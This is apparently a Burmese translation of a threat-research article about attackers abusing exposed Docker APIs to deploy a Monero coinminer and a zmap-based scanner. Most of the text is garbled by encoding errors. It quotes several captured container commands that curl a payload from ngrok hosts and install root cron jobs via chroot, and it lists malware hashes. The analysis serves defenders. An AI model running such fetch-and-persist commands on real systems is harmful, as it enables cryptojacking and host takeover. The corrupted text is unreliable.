áá»áœááºá¯ááºááá¯á·ááẠááŒáááºážááŒá±á¬ááºááŸá¯áá»á¬ážááᯠááŒá±áá¬áá¶ááẠáááºáá®ážáá¬ážááá·áº Honeypot ááœááºááááºáá¬áá»á¬ážááᯠá¡áá¯á¶ážááŒá¯á á á¯áá±á¬ááºážáááŸááá¬ážáá±á¬ á¡áá»ááºá¡áááºáá»á¬ážááᯠááá¯ááºážááŒá¬ážá áááºááŒá¬áá«áááºá ááá¯á·á¡ááŒáẠDocker Hub ááœáẠáááºááœá¬ááŸáá¯ááºáá±áá±á¬áá¯á¶ááᯠá¡áá¯á¶ážááŒá¯á áá áºáááºážáá±á¬ááœááºááááºáá¬áá»á¬ážá¡ááŒá ẠááŒáá·áºáá»ááºáá¬ážáá±á¬ áááá¯áá¬ážá¡ááºáá±á¬ ááá¯á·ááá¯áẠááœáá·áºááŒá¯áá»ááºáááŸááá² cryptocurrency ááá¯ááºážáá¯ááºáá¬ážáá»á¬ážáá¶á០áááá¬áááºááŸá¬ážáá±á¬áá¯ááºáá±á¬ááºáá»ááºááᯠááœá±á·ááŸááá²á·áááºá áá¯ááºáá¯á¶á¡á¬áž á¡áá¹ááá¬ááºááŸááá±á¬ cryptocurrency ááá¯ááºážáá¯ááºáá¬ážáá»á¬ážááᯠááá¯á·áá±á¬ááºáá±ážááá·áº áááºáá±á¬ááºááŸá¯á áá áºá áááºáá áºááá¯ááºážá¡ááŒá Ạá¡áá¯á¶ážááŒá¯áá¬ážáááºá
ááá¯á·á¡ááŒááºá á¡áá®ážáá¬ážááŸá ááœááºááááºáá¬áá»á¬ážááŸáá·áº á¡ááá®áá±ážááŸááºážáá»á¬ážááᯠáá±á¬ááºááœááºážáááºáá±á¬ááºáááºá¡ááœáẠááœááºáááºáá»á¬ážááŸáá·áº áá¯ááºáá±á¬ááºáááºá¡ááœáẠáááá¯ááááºáá»á¬ážááᯠááá·áºááœááºážáá¬ážáááºá
áá¯á¶ááŒá¯á¶áá±ážá¡á á®á¡áá¶áá»á¬áž ááá¯á·ááá¯áẠá¡ááá¯áá±á¬á·ááºáá²ááºááᯠáá±á¬ááºáááºááœá²ááá·áºááœááºážááŒááºážáááŸááá² áá»áœááºá¯ááºááá¯á·á áá»á¬ážáááºá¡áá¯ážáá»á¬ážááᯠáá¯á¶áá±áááºáááºáá»á¬ážááŒáá·áº áá¬ážáá²á·áááºá á¡ááŸá¬ážá¡ááœááºážáá»á¬ážááŸáá·áº ááá¯ážááŸááºážáá±á¬á¡á¬ážáááºážáá»ááºáá»á¬ážááá¯ááŸá±á¬ááºááŸá¬ážááẠDocker ááœáẠáááŠážááá·áºááœááºážááŸá¯á¡ááœáẠá¡ááŒá¶ááŒá¯áá»ááºáá»á¬ážááŸáááŒá±á¬ááºáž áá»á±ážáá°ážááŒá¯á áááááŒá¯áá«á ááá¯á·áá±á¬áº á¡áá¯á¶ážááŒá¯ááá·áº áá»á¬ážáááºá¡áá¯ážáá»á¬ážááẠááœááºááááºáá¬á¡ááœááºážááŸá á¡ááá®áá±ážááŸááºážáá»á¬ážááá¯ááºáá² ááœááºááááºáá¬á¡ááœááºážááŸá á¡ááºááºáá®áá±ážááŸááºážáá»á¬ážááá¯ááºáá² ááœááºááááºáá¬ááŒá¯áá¯ááºááá·áºááááºáá±á¬ááºážááᯠáááºááœááºá ááá¯ááºááá¯ááºááŸá¯áá»á¬ážááᯠááŸá¬ááœá±ááẠáá®ááá¯ááºážáá¯ááºáá¬ážááá·áº ááœááºááááºáá¬áá»á¬ážááŒá áºáááºá
á¡á¬ážáááºážáá»ááºáá»á¬ážááᯠáááá¯á¡ááºáá² Docker áá¬ážááŸááºážááŸáá·áºáááºáž áááºážááœá¬áá±á¬ááŒá±á¬áá·áº ááŸá¬ááœá±ááœá±á·ááŸááá¬ážáá±á¬ á¡áá¹ááá¬ááºááŸááá±á¬ áá¯ááºáá±á¬ááºáá»ááºááẠááŸááºáá¬ážááœááºáá±á¬ááºážáá«áááºá ááŸá¬ážááœááºážá áœá¬ ááŒááºáááºáááºááŸááºáá¬ážáá±á¬ áá¯á¶áá áºáá¯á¶á¡á¬áž ááŸá¬ááœá±ááŒááºáž ááŸáá·áº ááœáá·áºáá¬ážáá±á¬ ááœááºááááºáá¬áá¯á¶ááẠááá¯ááºááá¯ááºáá°áá»á¬ážááẠááœáá·áºáá¬ážáá±á¬ áá¬áá¬áá»á¬ážá áœá¬ááᯠáá°ážá ááºááẠááá¯á¡ááºáá±á¬ á¡áá¬áá»á¬ážááŒá áºáááºá
áááááºáá¬ážáá±á¬ Docker API ááẠáá¯á¶ážá
áœá²áá°á¡á¬áž áá»ááºááŒáá·áºá
áœá¬ áá¯ááºáá±á¬ááºááá¯ááºá
á±áá«áááºá
áááºáááºááœáẠmalware áá±ážááá¯á·ááŸá¯áááºážáááºážááŒá
áºáááºá áá¬áááºááœáẠáá¯á¶áá»á¬ážááᯠá¡áá±ážááááºážá
áá
áºááŒáá·áº ááœáŸáá·áºáá¯ááºááá¯ááºá
á±ááá·áº ááá¯ááºááá¯ááºáá°á áááºáááºážáá»ááºááŒá
áºáááºá
ááœáá·áºááŸá
áºáá¬ážáá±á¬ Docker APIs 3762 ááá¯ááºáá¶á¡ááá¯áẠááŒáá·áºááŒá°ážááŒááºážá 12.02.2019/XNUMX/XNUMX áááºá
áœá²áá« Shodan ááŸá¬ááœá±ááŸá¯á¡áá±á«áº á¡ááŒá±áá¶áááºá
ááá¯ááºááá¯ááºááŸá¯ááœááºážáááºááŸáá·áº payload ááœá±ážáá»ááºá áá¬áá»á¬áž
áá»á¬ážáááºá¡áá¯ážáá»á¬ážáá¡áá°á¡áá®ááŒáá·áºáá¬áá á¡áá¹ááá¬ááºááŸááá±á¬áá¯ááºáá±á¬ááºáá»ááºááᯠááœá±á·ááŸááá²á·áááºá Monero cryptocurrency ááá¹áá¯áá°ážáá±á¬áºáá±ážáá±á¬á·ááºáá²ááºááᯠá¡áá¯á¶ážááŒá¯ááẠáá¶áá¬ážá¡ááŒá
áºá¡áá¯á¶ážááŒá¯áá±á¬ ááŸá¬ážááœááºážááœá²á·á
ááºážáá¬ážáá±á¬ ááœááºááááºáá¬áá
áºáá¯ááᯠáá»áœááºá¯ááºááá¯á· á
á¯á¶á
ááºážá
á
áºáá±ážááŒá®ážáá±á¬áẠáá±á¬áºáá¯ááºáá¬ážááá·áº Docker API á¡áá±á¡ááœáẠ(áá¯áááááááºááá¯ááŒáá·áºáá«) ááá¯ážáá¬ááŒá±á¬ááºáž Shodan á០áá±áá¬á áá±á¬áºááŒáááºá ááŒá®ážáá²á·ááá·áºááŸá
Ạá¡á±á¬ááºááá¯áá¬á (2018á áááºááŸááá±áá¬
Honeypot ááŸááºáááºážáá»á¬ážááᯠá
á
áºáá±ážááŸá¯ááœáẠááœááºááááºáá¬áá¯á¶á¡áá¯á¶ážááŒá¯ááŸá¯ááẠá¡áá¯á¶ážááŒá¯ááŸá¯ááŸáá·áº áááºá
ááºáá±ááŒá±á¬ááºáž ááŒááá²á·áááºá
Tty: false
Command: â-c curl âretry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d âhxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283â;echo â* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283dâ >/tmp9bedce/etc/crontab;echo â* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283dâ >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c âcron || crondââ,
Entrypoint: â/bin/shâ
Tty: false,
Command: â-c curl âretry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d âhxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283â;echo â* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283dâ >/tmp570547/etc/crontab;echo â* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283dâ >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c âcron || crondââ,
Entrypoint: â/bin/shâ
Tty: false,
Command: â-c curl âretry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed âhxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4eeâ;echo â* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eedâ >/tmp326c80/etc/crontab;echo â* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eedâ >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c âcron || crondââ,
Entrypoint: â/bin/shâ,
Tty: false,
Cmd: â-c curl âretry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed âhxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4eeâ;echo â* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eedâ >/tmp8b9b5b/etc/crontab;echo â* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eedâ >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c âcron || crondââ,
Entrypoint: â/bin/shâ
áááºááœá±á·ááŒááºáááá·áºá¡ááá¯ááºážá á¡ááºáá¯ááºáá¯ááºáá¬ážáá±á¬ááá¯ááºáá»á¬ážááᯠá¡áááºáááŒááºááŒá±á¬ááºážáá²áá±áá±á¬ URL áá»á¬ážá០áá±á«ááºážáá¯ááºáá¯ááºáá«áááºá ဠURL áá»á¬ážááẠáááºáááºážááᯠáááºá áœá²áá áºáᯠááŸááááºá ááá¯á·ááŒá±á¬áá·áº áááºáááºážáá¯ááºáá¯á¶ážáááºááŒá®ážáá±á¬áẠpayload áá»á¬ážááᯠáá±á«ááºážáá¯ááºáá¯ááºá áááá«á
payload option ááŸá áºáá¯ááŸááááºá ááááá áºáá¯ááẠááá¹áá¯ááœááºážáá±áááºááá¯á· áá»áááºáááºáá±ážááá·áº Coinminer.SH.MALXMR.ATNO (á¡ááŒá ẠáááºááŸááºáá¬ážáá±á¬ Linux á¡ááœáẠá á¯á ááºážáá¬ážáá±á¬ ELF ááá¹áá¯ááœááºážááá¬áž) ááŒá áºáááºá áá¯áááááŸá¬ ááœááºáááºá¡ááœá¬á¡áá±ážáá»á¬ážááᯠá áááºááºáááºááŒá®áž áá áºááŸááºá¡áá áºáá»á¬ážááᯠááŸá¬ááœá±ááẠá¡áá¯á¶ážááŒá¯ááá·áº ááœááºáááºáááááá¬á¡áá»áá¯á·ááᯠááá°ááẠáá®ááá¯ááºážáá¯ááºáá¬ážááá·áº script (TrojanSpy.SH.ZNETMAP.A) ááŒá áºáááºá
dropper script ááẠcryptocurrency miner ááá¯á¡áá¯á¶ážááŒá¯áááºá¡ááœáẠvariable ááŸá áºáá¯ááá¯áááºááŸááºáá±ážáááºá HOST variable ááœáẠá¡áá¹ááá¬ááºááŸááá±á¬ááá¯ááºáá»á¬áž áááºááŸááᬠURL áá«áááºááŒá®áž RIP variable ááẠá¡áá¯á¶ážáá»ááá·áº miner á ááá¯ááºá¡ááẠ(á¡ááŸááºá¡á¬ážááŒáá·áº hash) ááŒá áºáááºá hash variable ááŒá±á¬ááºážááá¯ááºáž HOST variable ááẠááŒá±á¬ááºážáá²áááºá script ááẠááá¯ááºááá¯ááºáá¶ááá±á¬ áá¬áá¬ááœáẠá¡ááŒá¬áž cryptocurrency miner áá»á¬áž áá¯ááºáá±á¬ááºááŒááºážáááŸáááŒá±á¬ááºážááá¯áááºáž á á áºáá±ážáááºááŒáá¯ážá á¬ážáá«áááºá
HOST ááŸáá·áº RIP variable áá»á¬áž á¥ááá¬áá»á¬ážá¡ááŒáẠá¡ááŒá¬ážááá¯ááºážááœááºážáá¯ááºáá¬ážáá»á¬áž áá¯ááºáá±á¬ááºááŒááºážáááŸáááŒá±á¬ááºáž á
á
áºáá±ážááẠá¡áá¯á¶ážááŒá¯ááá·áº áá¯ááºá¡ááá¯á¡ááœá¬áá»á¬áž
ááá¹áá¯ááœááºážáá¯ááºáááºážááᯠáá áááºáá®á áááºážááᯠnginx áᯠá¡áááºááŒá±á¬ááºážáá¬ážáááºá ဠscript á á¡ááŒá¬ážáá¬ážááŸááºážáá»á¬ážááẠááá¹áá¯ááœááºážáá°ážáá°ááᯠLinux áááºáááºážáá»ááºááœáẠááŸááá±ááá¯ááºááá·áº á¡ááŒá¬ážááá¬ážáááºáááºáá±á¬ááºááŸá¯áá»á¬ážááá¯á· á¡áááºááŒá±á¬ááºážáá«á áááºážááẠáá¯á¶ááŸááºá¡á¬ážááŒáá·áº áá¯ááºáá±á¬ááºáá±ááá·áº áá¯ááºáááºážá ááºáá»á¬ážá á¬áááºážá¡á¬áž á á áºáá±ážááŸá¯áá»á¬ážááᯠáá»á±á¬áºááŒááºááẠáá¯á¶áá±á¬ááºáá«áááºá
ááŸá¬ááœá±áá±áž Script ááœááºáááºáž á¡ááºá¹áá«áááºáá»á¬áž áá«ááŸááááºá áááºážááẠááá¯á¡ááºáá±á¬áááááá¬áá»á¬ážááᯠá¡áá¯á¶ážááŒá¯ááẠáá°áá®áá±á¬ URL áááºáá±á¬ááºááŸá¯ááŒáá·áº á¡áá¯ááºáá¯ááºáá«áááºá áááºážááá¯á·áá²ááœáẠááœááºáááºáá»á¬ážááᯠá áááºááºáááºáᬠááœáá·áºáá¬ážáá±á¬ ááááºáááºážáá»á¬ážá á¬áááºážááᯠááá°ááẠá¡áá¯á¶ážááŒá¯ááá·áº zmap binary ááŒá áºáááºá script ááẠááœá±á·ááŸááá±á¬áááºáá±á¬ááºááŸá¯áá»á¬ážááŸáá·áº á¡ááŒááºá¡ááŸááºáá¯á¶á·ááŒááºáááºá¡áá¯á¶ážááŒá¯ááá·áº á¡ááŒá¬ážáá±á¬ binary ááá¯áááºááŒá®áž ááœá±á·ááŸááá±á¬áááºáá±á¬ááºááŸá¯ááŸáá·áºáááºáááºááá·áº áá±á¬ááºáááºá¡áá»ááºá¡áááºáá»á¬ážááá¯áá¯á¶ážááŒááºááẠáááºážááá¯á·áá¶ááŸááá°ážá ááºážáá»á¬ážááá¯áááºáá¶áááŸáááẠ(á¥ááá¬á áááºážááá¬ážááŸááºáž)á
script ááẠá áááºááºáááºááẠááœááºáááºá¡ááá¯ááºážá¡ááŒá¬ážá¡áá»áá¯á·ááá¯áááºáž ááŒáá¯áááºáááºááŸááºáá±ážáááºá ááá¯á·áá±á¬áº áááºážááẠscript ááá¬ážááŸááºážáá±á«áºááœááºáá°áááºáá«áááºá á áááºááºááá¯ááºáá±á¬ááºáá® Docker ááẠáááºáá±á¬ááºááŸá¯áá»á¬ážá០áá áºááŸááºáá»á¬ážááᯠáááºááŸááºáá±ážáááºá
ááŒá
áºááá¯ááºááá»áŸ áá
áºááŸááºáá»á¬ážááᯠá¡ááŒááºáá¯á¶ážááœá±á·ááŸááá«á ááá°ážá
ááºážáá»á¬ážááᯠáááºážááá¯á·áá¶á០á¡ááá¯á¡áá»á±á¬áẠáááºááŸá¬ážáá«áááºá áá¬ááºááœáŸááºážááẠáááºáá±á¬ááºááŸá¯áá»á¬ážá á¡ááá®áá±ážááŸááºážáá»á¬ážá á¡á
áááºá¡ááá¯ááºážáá»á¬áž ááá¯á·ááá¯áẠá
áááºáááºá
á¬ážááœááºááááºáá±á¬ááºážáá»á¬ážáá±á«áº áá°áááºá áá
áºááŸááºáá»á¬ážááᯠá
á
áºáá¯ááºáááº- Redisá Jenkinsá Drupalá MODXá
ááá¯ááºááá¯ááºááŸá¯ vector ááẠáá±á¬ááºáá¯ááºááŸá áºáá¯ááœááºááœá±á·ááá¯ááºááá²á·ááá¯á· Docker áá¯á¶ááŒá áºáááºá
ááááºááœááºááá¬ážáááºáááºáá±á¬ááºááŸá¯áá
áºáá¯á¡ááŒá
Ạá¡áááºááŒá±á¬ááºážáá¬ážááŒá®áž á¡á±á¬ááºááŒá±ááœáẠááœááºáááºáá»á¬ážááá¯á
áááºááºáááºááẠzmap ááá¯á¡áá¯á¶ážááŒá¯áá¯á¶ááŒá
áºáááºá
ááááºááœáẠááŒáá¯áááºáááºááŸááºáá¬ážáá±á¬ ááœááºáááºá¡ááá¯ááºážá¡ááŒá¬ážáá»á¬ážááŸáááŒá®áž á¡á±á¬ááºááŒá±ááœáẠDocker á¡áá«á¡ááẠáááºáá±á¬ááºááŸá¯áá»á¬ážááᯠááŸá¬ááœá±áááºá¡ááœáẠáá®ážááŒá¬ážááááºáááºážáá»á¬ážááŒá
áºáááºá
áááºáá¬ážááŒááºáá¬ááºáá¯á¶ááœáẠalpine-curl áá¯ááºáá¯á¶ááᯠá¡ááŒááẠ10 áááºážáá»á±á¬áº áá±á«ááºážáá¯ááºáá¯ááºáá¬ážááŒá±á¬ááºáž ááŒááá¬ážáááºá
á¡áá»áá¯ážáá»áá¯ážáá±á¬ áááá¯ááá¯áá±á¬áá»á¬ážááŸáááá·áº ááá¯ááºáá»á¬ážááœáŸá²ááŒá±á¬ááºážááŒááºážá¡ááœáẠá¡áááºážá¡ááŒá
áº-áááá±á¬ááºáá±á¬ CLI áááááá¬ááŒá
áºááá·áº Alpine Linux ááŸáá·áº curl ááᯠá¡ááŒá±áá¶á áááºáááºáá±á¬ááºááá¯ááºáááºá
á€áá¯á¶ (alpine-curl) ááá¯ááºááá¯ááºá á¡áá¹ááá¬ááºááá¯ááºááŒá±á¬ááºáž áááááŒá¯ááẠá¡áá±ážááŒá®ážáá«áááºá ááá¯á·áá±á¬áº á¡áááºááœááºááŒááºáááá·áºá¡ááá¯ááºážá áááºážááᯠá¡áá¹ááá¬ááºááŸááá±á¬ áá¯ááºáá±á¬ááºáá»ááºáá»á¬ážááᯠáá¯ááºáá±á¬ááºááẠá¡áá¯á¶ážááŒá¯ááá¯ááºáááºá á¡áá¬ážáá° Docker áá¯á¶áá»á¬ážááᯠá¡áá¹ááá¬ááºááŸááá±á¬ áá¯ááºáá±á¬ááºááŸá¯áá»á¬áž áá¯ááºáá±á¬ááºáááºáááºáž á¡áá¯á¶ážááŒá¯ááá¯ááºáááºá áá»áœááºá¯ááºááá¯á· Docker ááᯠáááºááœááºáá²á·ááŒá®áž á€ááŒá¿áá¬á¡ááœáẠáááºážááá¯á·ááŸáá·áº áá¯ááºáá±á¬ááºáá²á·áááºá
á¡ááŒá¶ááŒá¯áá»ááºáá»á¬áž
á€áá±á¬ááºážáá«ážááœáẠááœá±ážááœá±ážáá¬ážáá±á¬ á¡ááŒá áºá¡áá»ááºááẠá¡á±á¬ááºáá« á¡ááŒá¶ááŒá¯áá»ááºáá»á¬áž á¡áá«á¡ááẠáá±ážáááºážáá±ážááᯠá¡á ááááºážá ááá·áºááœááºážá ááºážá á¬ážááẠááá¯á¡ááºááŒá±á¬ááºáž áá®ážáá±á¬ááºážááá¯ážááŒáááº-
- á áá áºá á®áá¶ááá·áºááœá²áá°áá»á¬ážááŸáá·áº áá±á¬á·ááºáá²á¡ááºáá»ááºáá®áá¬áá»á¬ážá¡ááœááº- áááá»áá±á¬áá¬áᬠááá¯á·ááá¯áẠá¡ááœááºážááœááºáááºá០áá±á¬ááºážááá¯áá»ááºáá»á¬ážááá¯áᬠáááºáá¶ááẠá¡áá¬á¡á¬ážáá¯á¶ážááᯠá á®á ááºáááºááŸááºáá¬ážááŒá±á¬ááºáž áá±áá»á¬á á±ááẠáááºá API áááºáááºáá»á¬ážááᯠá¡ááŒá²á á áºáá±ážáá«á
- á¡áááºážáá¯á¶ážá¡ááœáá·áºá¡áá±ážá áááá¬áááᯠááá¯ááºáá¬áá«- ááœááºááááºáá¬áá¯á¶áá»á¬ážááᯠáááºááŸááºáá±ážááá¯ážááŒá®áž á¡áááºááŒá¯ááŒá±á¬ááºáž áá±áá»á¬á á±áááºá á¡áá±ážááŒá®ážáá±á¬ á¡á áááºá¡ááá¯ááºážáá»á¬áž (ááœááºááááºáá¬á áááºááŒááºážáááºáá±á¬ááºááŸá¯) ááá¯á· áááºáá±á¬ááºááœáá·áºááᯠááá·áºáááºááŒá®áž ááœááºáááºáá»áááºáááºááŸá¯áá»á¬ážááœáẠáá¯ááºáá¶áá«ááºááá·áºáá«á
- ááá¯ááºáá¬áá«á
á¡ááŒá¶ááŒá¯áá»ááºáá»á¬áž áá¯á¶ááŒá¯á¶áá±áž ááá¹ááá¬ážáá»á¬ážááᯠááœáá·áºáá«á á¥ááá¬áDocker á០ááŸáá·áº built-ináá¯á¶ááŒá¯á¶áá±ážá¡ááºá¹áá«áááºáá»á¬áž . - ááœááºááááºáá¬á¡ááœááºáž áá¯ááºáá±á¬ááºáá±ááá·áº áá¯ááºáááºážá ááºáá»á¬ážá¡ááŒá±á¬ááºáž áá±á¬ááºáááºá¡áá»ááºá¡áááºáá»á¬ážááᯠááá°ááẠruntime ááŸáá·áº áá¯á¶áá»á¬ážááᯠá¡ááá¯á¡áá»á±á¬ááºá áááºááºáááºááŒááºážááᯠá¡áá¯á¶ážááŒá¯áá« (á¥ááá¬á á¡áá¯á¡áá±á¬áẠááá¯á·ááá¯áẠá¡á¬ážáááºážáá»ááºáá»á¬ážááᯠááŸá¬ááœá±áááº)á á¡ááá®áá±ážááŸááºážááááºážáá»á¯ááºááŸá¯ááŸáá·áº ááá¬ááá á±á¬áá·áºááŒááºááŒááºážááá¯á·ááẠáá¬áá¬áá»á¬ážá ááá¯ááºáá»á¬ážááŸáá·áº á áá áºá§áááá¬áá»á¬ážááá¯á· áá¯á¶ááŸááºááá¯ááºáá±á¬ááŒá±á¬ááºážáá²ááŸá¯áá»á¬ážááᯠááŒá±áá¬áá¶ááẠáá°áá®áá±ážáá«áááºá
Trendmicro ááẠDevOps á¡ááœá²á·áá»á¬ážááᯠáá¯á¶ááŒá¯á¶á
áœá¬áááºáá±á¬ááºáááºá áá»ááºááŒááºá
áœá¬ááœááºááŒá®áž áááºááá·áºáá±áá¬ááœááºáááᯠá
áááºááẠáá°áá®áá±ážáááºá Trend Micro
á¡áá»áŸá±á¬á·á¡áááºáž ááá¹ááá¬áá»á¬áž
áááºá áẠhashe áá»á¬áž-
- 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
- f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)
á¡áá±á«áº
source: www.habr.com